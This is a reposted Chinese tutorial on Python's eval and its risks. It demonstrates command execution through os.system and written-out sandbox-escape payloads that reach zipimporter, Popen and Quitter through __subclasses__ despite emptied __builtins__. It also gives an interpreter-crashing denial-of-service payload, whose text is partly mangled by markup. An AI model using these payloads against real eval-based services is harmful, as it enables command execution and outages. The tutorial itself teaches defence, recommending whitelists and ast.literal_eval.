點擊下載
本文文檔

當前位置：首頁 - 科技 - 知識百科 - 正文

python中eval的用法詳解及潛在風險介紹

來源：懂視網責編：小采時間：2020-11-27 14:20:24

python中eval的用法詳解及潛在風險介紹

python中eval的用法詳解及潛在風險介紹:本篇文章給大家帶來的內容是關于python中eval的用法詳解及潛在風險介紹，有一定的參考價值，有需要的朋友可以參考一下，希望對你有所幫助。eval前言In [1]: eval("2+3") Out[1]: 5 In [2]: eval('[x for x in ran

推薦度：

點擊下載本文 文檔為doc格式

導讀python中eval的用法詳解及潛在風險介紹:本篇文章給大家帶來的內容是關于python中eval的用法詳解及潛在風險介紹，有一定的參考價值，有需要的朋友可以參考一下，希望對你有所幫助。eval前言In [1]: eval("2+3") Out[1]: 5 In [2]: eval('[x for x in ran

本篇文章給大家帶來的內容是關于python中eval的用法詳解及潛在風險介紹，有一定的參考價值，有需要的朋友可以參考一下，希望對你有所幫助。

eval前言

In [1]: eval("2+3")
Out[1]: 5

In [2]: eval('[x for x in range(9)]')
Out[2]: [0, 1, 2, 3, 4, 5, 6, 7, 8]

當內存中的內置模塊含有os的話，eval同樣可以做到命令執行：

In [3]: import os

In [4]: eval("os.system('whoami')")
hy-201707271917administrator
Out[4]: 0

當然，eval只能執行Python的表達式類型的代碼，不能直接用它進行import操作，但exec可以。如果非要使用eval進行import，則使用__import__：

In [8]: eval("__import__('os').system('whoami')")
hy-201707271917administrator
Out[8]: 0

在實際的代碼中，往往有使用客戶端數據帶入eval中執行的需求。比如動態模塊的引入，舉個栗子，一個在線爬蟲平臺上爬蟲可能有多個并且位于不同的模塊中，服務器端但往往只需要調用用戶在客戶端選擇的爬蟲類型，并通過后端的exec或者eval進行動態調用，后端編碼實現非常方便。但如果對用戶的請求處理不恰當，就會造成嚴重的安全漏洞。

安全”使用eval

現在提倡最多的就是使用eval的后兩個參數來設置函數的白名單：

Eval函數的聲明為eval(expression[, globals[, locals]])

其中，第二三個參數分別指定能夠在eval中使用的函數等，如果不指定，默認為globals()和locals()函數中包含的模塊和函數。

>>> import os
>>> 'os' in globals()
True
>>> eval('os.system('whoami')')
win-20140812chjadministrator
0
>>> eval('os.system('whoami')',{},{})
Traceback (most recent call last):
 File "", line 1, in 
 File "", line 1, in 
NameError: name 'os' is not defined

如果指定只允許調用abs函數，可以使用下面的寫法：

>>> eval('abs(-20)',{'abs':abs},{'abs':abs})
20
>>> eval('os.system('whoami')',{'abs':abs},{'abs':abs})
Traceback (most recent call last):
 File "", line 1, in 
 File "", line 1, in 
NameError: name 'os' is not defined
>>> eval('os.system('whoami')')
win-20140812chjadministrator
0

使用這種方法來防護，確實可以起到一定的作用，但是，這種處理方法可能會被繞過，從而造成其他問題！

繞過執行代碼1

被繞過的情景如下，小明知道了eval會帶來一定的安全風險，所以使用如下的手段去防止eval執行任意代碼：

env = {}
env["locals"] = None
env["globals"] = None
env["__name__"] = None
env["__file__"] = None
env["__builtins__"] = None
 
eval(users_str, env)

Python中的__builtins__是內置模塊，用來設置內置函數的模塊。比如熟悉的abs，open等內置函數，都是在該模塊中以字典的方式存儲的，下面兩種寫法是等價的：

>>> __builtins__.abs(-20)
20
>>> abs(-20)
20

我們也可以自定義內置函數，并像使用Python中的內置函數一樣使用它們：

>>> def hello():
... print 'shabi'
>>> __builtin__.__dict__['say_hello'] = hello
>>> say_hello()
shabi

小明將eval函數的作用域中的內置模塊設置為None，好像看起來很徹底了，但依然可以被繞過。__builtins__是__builtin__的一個引用，在__main__模塊下，兩者是等價的：

>>> id(__builtins__)
3549136
>>> id(__builtin__)
3549136

根據烏云drops提到的方法，使用如下代碼即可：

[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")

上面的代碼首先利用__class__和__subclasses__動態加載了object對象，這是因為eval中無法直接使用object。然后使用object的子類的zipimporter對egg壓縮文件中的configobj模塊進行導入，并調用其內置模塊中的os模塊從而實現命令執行，當然，前提是要有configobj的egg文件。 configobj模塊很有意思，居然內置了os模塊：

>>> "os" in configobj.__dict__
True
>>> import urllib
>>> "os" in urllib.__dict__
True
>>> import urllib2
>>> "os" in urllib2.__dict__
True
>>> configobj.os.system("whoami")
win-20140812chjadministrator
0

和configobj類似的模塊如urllib，urllib2，setuptools等都有os的內置，理論上使用哪個都行。如果無法下載egg壓縮文件，可以下載帶有setup.py的文件夾，加入：

from setuptools import setup, find_packages

然后執行:

python setup.py bdist_egg

就可以在dist文件夾中找到對應的egg文件。繞過demo如下：

>>> env = {}
>>> env["locals"] = None
>>> env["globals"] = None
>>> env["__name__"] = None
>>> env["__file__"] = None
>>> env["__builtins__"] = None
>>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"
>>> eval(users_str, env)
win-20140812chjadministrator
0
>>> eval(users_str, {}, {})
win-20140812chjadministrator
0

拒絕服務攻擊1

object的子類中有很多有趣的東西，執行以下代碼查看：

[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]

這里我就不輸出結果了，如果你執行的話，可以看到很多有趣的模塊，比如file，zipimporter，Quitter等。經過測試，file的構造函數是被解釋器沙箱隔離的。簡單的，或者直接使object暴露出的子類Quitter進行退出：

>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__
 == 'Quitter'][0](0)()", {'__builtins__':None})

C:/>
如果運氣好，遇到對方程序中導入了os等敏感模塊，那么Popen就可以用，并且繞過__builins__為空的限制，例子如下：

>>> import subprocess
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None})
 
>>>
正在 Ping 127.0.0.1 具有 32 字節的數據:
來自 127.0.0.1 的回復: 字節=32 時間>>

事實上，這種情況非常多，比如導入os模塊，一般用來處理路徑問題。所以說，遇到這種情況，完全可以列舉大量的功能函數，來探測目標object的子類中是否含有一些危險的函數可以直接使用。

拒絕服務攻擊2

同樣，我們甚至可以繞過__builtins__為None，造成一次拒絕服務攻擊，Payload(來自老外blog)如下：

>>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()', {"__builtins__":None})

運行上面的代碼，Python直接crash掉了，造成拒絕服務攻擊。原理是通過嵌套的lambda來構造一片代碼段，即code對象。為這個code對象分配空的棧，并給出相應的代碼字符串，這里是KABOOM，在空棧上執行代碼，會出現crash。構造完成后，調用fc函數即可觸發，其思路不可謂不淫蕩。

總結

從上面的內容我們可以看出，單單將內置模塊置為空，是不夠的，最好的機制是構造白名單，如果覺得比較麻煩，可以使用ast.literal_eval代替不安全的eval。

本篇文章到這里就已經全部結束了，更多其他精彩內容可以關注PHP中文網的python視頻教程欄目！

聲明：本網頁內容旨在傳播知識，若有侵權等問題請及時與本網聯系，我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com